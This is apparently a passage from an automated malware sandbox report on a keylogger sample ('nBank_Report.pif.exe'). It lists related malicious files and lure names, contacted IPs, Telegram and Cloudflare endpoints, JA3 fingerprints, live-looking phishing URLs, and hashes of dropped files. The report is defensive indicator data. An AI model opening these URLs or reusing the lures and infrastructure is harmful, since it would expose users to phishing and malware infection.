                                              • 193.122.6.168
                                              ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 193.122.6.168
                                              SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.8.169
                                              CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 193.122.130.0
                                              RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 158.101.44.242
                                              Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 193.122.130.0
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 193.122.130.0
                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.8.169
                                              Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.8.169
                                              api.telegram.orgz1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 149.154.167.220
                                              ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.comGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              bg.microsoft.map.fastly.netz1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 199.232.210.172
                                              https://zqvee2re50mr.comGet hashmaliciousUnknownBrowse
                                              • 199.232.210.172
                                              https://google.gg/amp/enjin-io.netGet hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                              • 199.232.214.172
                                              HPDeskJet_043_SCAN.pdfGet hashmaliciousPhisherBrowse
                                              • 199.232.214.172
                                              https://pdftomuchmattersupdatings-vercel-app.translate.goog/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wappGet hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              http://linksapp.top:443Get hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              https://www.cognitoforms.com/f/elMiWbNXi0G8lOV9LA6SDg/1Get hashmaliciousHTMLPhisherBrowse
                                              • 199.232.214.172
                                              http://tiktoksc.xyz/Get hashmaliciousUnknownBrowse
                                              • 199.232.214.172
                                              https://qwehikd-asdu.xyz/Get hashmaliciousUnknownBrowse
                                              • 199.232.210.172

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              TELEGRAMRUz1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 149.154.167.220
                                              ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              http://mintlink32.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                              • 149.154.167.99
                                              https://bostempek.vercel.app/Get hashmaliciousPorn ScamBrowse
                                              • 149.154.167.99
                                              CLOUDFLARENETUSz1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 188.114.97.3
                                              https://storage.googleapis.com/inbound-mail-attachments-prod/0cbecb77-b573-4b3b-8c97-8b461d262d51?GoogleAccessId=distribution-controller-prod@inbound-mail-attachments.iam.gserviceaccount.com&Expires=1758806989&Signature=teNXGJRcW9uuEoVVvD0bLb%2BTGBorxpSu89OlgLR0AZpo8aoMl3JFsBDoXmLnj9QMk%2BAPu8iGsKTPrT4i0XSxxzRmtCLdsbDi23%2FFHfN4OpU3mOnUXtbZ81e7h5Ax%2FIygnxvogL7iGUXrqQUBZEnVkPmXcpAMmBTX7%2Bj4kVf57xBQo4WA9yGdv5Df4b9nDGZMXEYZVxWjPtOk4%2FXapMoV5bYJLgpB%2BR%2F1LUE0IwT1d3wuv1q6TONtaWwducy4mc1%2FJvGqxFuxuW9Y6Ojq%2B7a%2FqCW4DaFdd42O6ViY63C8G7dPbTe9LtxhwHcAk9xg3n5kXh2Z75tDAkK2Ak5mKneP6g%3D%3DGet hashmaliciousUnknownBrowse
                                              • 1.1.1.1
                                              https://t.co/gYSeG2q7l2Get hashmaliciousUnknownBrowse
                                              • 104.18.95.41
                                              ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 188.114.97.3
                                              asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 188.114.97.3
                                              https://cantanero.pro/Get hashmaliciousHTMLPhisherBrowse
                                              • 172.67.181.118
                                              HPDeskJet_043_SCAN.pdfGet hashmaliciousPhisherBrowse
                                              • 188.114.96.3
                                              SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              UTMEMUSSecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.8.169
                                              Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.8.169
                                              Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 132.226.247.73
                                              SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 132.226.247.73
                                              file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 132.226.247.73

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              54328bd36c14bd82ddaa0c04b25ed9adz1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 188.114.96.3
                                              https://docs.google.com/drawings/d/1wD-DOvNLKuM60BZj5TLzFjKI87o3EE-OVAmvFF0fxPk/preview?usp=sharingGet hashmaliciousUnknownBrowse
                                              • 188.114.96.3
                                              ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              3b5074b1b5d032e5620f69f9f700ff0ez1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 149.154.167.220
                                              ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 149.154.167.220
                                              sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                              • 149.154.167.220
                                              sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 149.154.167.220
                                              sostener.vbsGet hashmaliciousRemcosBrowse
                                              • 149.154.167.220
                                              asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                              • 149.154.167.220
                                              SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 149.154.167.220
                                              RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                              • 149.154.167.220

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_VtPPJdSqnkbmja.e_54ceb08e8bfad9f92dfc1bc5b3988cc6f2cada_8be0a55d_1571f6fa-7dfe-4fa9-a562-830001c7ca32\Report.wer

                                              Download File
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.167097783057657
                                              Encrypted:false
                                              SSDEEP:192:qAEWQ7LtK0BU/Ka6ce36qZzuiFQZ24IO86:JEW0L7BU/KarVqZzuiFQY4IO86
                                              MD5:070BB4989DA2D4ADCD55EB5444535F08
                                              SHA1:D97646161F23F1182752B55479886392A98856CC
                                              SHA-256:91E77E8578A22E8B32C8EC67485B6C20566909C99DFF87982E300B960848A402
                                              SHA-512:32D96848B20735C8F72CBD6A534E96F8990D3BA7B154BD1C06C6C5A5810806C8773BB9C6E2C0F86214E27DCC3556510DD3F043E67922B1505B4B963606BBA88F
                                              Malicious:false
                                              Reputation:low
                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.8.1.6.8.2.0.2.0.9.0.7.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.8.1.6.8.2.1.5.3.7.2.0.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.7.1.f.6.f.a.-.7.d.f.e.-.4.f.a.9.-.a.5.6.2.-.8.3.0.0.0.1.c.7.c.a.3.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.8.5.2.9.2.d.1.-.1.a.e.d.-.4.8.a.b.-.a.2.8.0.-.2.9.0.b.f.9.d.3.d.e.6.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.V.t.P.P.J.d.S.q.n.k.b.m.j.a...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.f.L.p.g...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.7.c.-.0.0.0.1.-.0.0.1.3.-.7.6.d.2.-.3.7.2.4.f.7.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.3.e.2.5.3.7.4.c.f.4.2.b.3.4.f.c.4.0.c.a.8.b.8.2.3.3.c.e.c.a.0.0.0.0.0.0.0.0.!.0.0.0.0.5.8.6.1.e.8.4.d.f.6.7.6.a.f.5.5.2.1.0.6.a.b.1.5.c.3.0.8.a.d.4.4.6.6.2.a.

                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EF6.tmp.dmp

                                              Download File
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 15 streams, Thu Sep 26 09:33:40 2024, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):322851
                                              Entropy (8bit):3.430166181961367
                                              Encrypted:false
                                              SSDEEP:3072:59X9E2aVhtrjyjiu/84uEqhtS3ULTgHRZfBOz2rFm:59XvyXrjy504+tjTgHRZf5m
                                              MD5:3CF1927CE7A157209C42BCEA0B7830A3
                                              SHA1:F4DEF1DEC7A0C1C730DC80D673799C69F9BD35C2
                                              SHA-256:2E38AE0DAB7A38A81DA6819EFB6993D4FA40764AE4758670EA4BEF520020E1DE
                                              SHA-512:B0702C3FAD83DF76DB00B33DBA8703DCF75EF10EE2F99731B07AE22FC7723792A54F7AE83A6676743A9D5FD34BC06F1EF0C5A361181A63F47DEFF3B9E55DC08E
                                              Malicious:false
                                              Reputation:low
                                              Preview:MDMP..a..... .......t*.f............4...............H.......T....).......%...g..........`.......8...........T...........pc..............l)..........X+..............................................................................eJ.......+......GenuineIntel............T.......|...g*.f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER910A.tmp.WERInternalMetadata.xml

                                              Download File
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):6416
                                              Entropy (8bit):3.7210078748053808
                                              Encrypted:false
                                              SSDEEP:96:RSIU6o7wVetbWn68YYZDWQE/JZY5aM4Us89beUsfZKm:R6l7wVeJWn6DYZi4prs89beUsfZKm
                                              MD5:F7A56D784DBD50B4AF049E498DF69506
                                              SHA1:AAA2F14296AF0B558D8E1E5B02C6A4E08E08572D
                                              SHA-256:DC853691C6EA5AE58CE191A13365E1A44F9B83B6ACC0A4070DC062BE975F3B47
                                              SHA-512:23CBB661381EC4D71E54E2171CA89891EC05E7E3892C67D2817AD344ABC0C6CB319F90D7AC35A95BD2151BC58D1E18A5876A1F9CC9C17CB1A2CEA23C7CAD3B20
                                              Malicious:false
                                              Reputation:low
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.0.0.<./.P.i.

                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER9188.tmp.xml

                                              Download File
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4773
                                              Entropy (8bit):4.486490855828887
                                              Encrypted:false
                                              SSDEEP:48:cvIwWl8zsuJg77aI93ZjWnWpW8VYjdBYm8M4J/DuFS+q8vUDr0c3eTd:uIjfkI7pZj77VnJJKe0c3kd
                                              MD5:884B317D7B38897276D9FEDA3815714F
                                              SHA1:C221E114980FCE468FEA6E0AB1893AD01BBEA8B6
                                              SHA-256:DFFD0F0AB2428F1D602C9F2E82064B8BC1D9EB61A999949F3EE4ED5585A342AA
                                              SHA-512:8C269272CFFDC2E70784A872ED702BF58DF713F85ADA68111D6F43C408E1A244C6EC2794349972E1ACBE33890EA41D92F8895F74330933EB552FADD6C17E9F9A
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="516996" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                              Download File
                                              Process:C:\Users\user\Desktop\nBank_Report.pif.exe
                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                              Category:dropped
                                              Size (bytes):71954
                                              Entropy (8bit):7.996617769952133
                                              Encrypted:true
                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                              Malicious:false
                                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                              Download File
                                              Process:C:\Users\user\Desktop\nBank_Report.pif.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):328
                                              Entropy (8bit):3.1373097131392975
                                              Encrypted:false
                                              SSDEEP:6:kKL0L9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:zFDnLNkPlE99SNxAhUe/3
                                              MD5:2A31092A4E2D4520205F052F84CA2B4C
                                              SHA1:5D68EB8A34B53CEAFD935D2B8CFA15E59A8A29F9
                                              SHA-256:2956F76184809F6BD2BA257F1D1D3A92953CEBA7CED3F684DB26CFE92EEE1120
                                              SHA-512:D83327B6ECDC616EF8CE4A3CAA87713AD0C00E192D4EC83CE43085426CA0B311756BB18293C53A701FD8554E72D9D1962632BA9E36C6A6F39E60FF870EB7D355
                                              Malicious:false
                                              Preview:p...... ...........l2..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VtPPJdSqnkbmja.exe.log

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nBank_Report.pif.exe.log

                                              Download File
                                              Process:C:\Users\user\Desktop\nBank_Report.pif.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1216
                                              Entropy (8bit):5.34331486778365
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                              Malicious:true
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2232
                                              Entropy (8bit):5.3810236212315665
                                              Encrypted:false
                                              SSDEEP:48:lylWSU4xympg4REoUP7gZ9tK8NPZHUx7u1iMugeC/ZPUyus:lGLHxveIjLZ2KRH6Oug8s
                                              MD5:C4816B51E035550B11619187A4E28318
                                              SHA1:39FF31DF80EDB8A0123BB385692A5C5C39DC6CC0
                                              SHA-256:061DEA682FE62CB0F6D4F4AB8D785129109F847B98078D47E440402D1490D26D
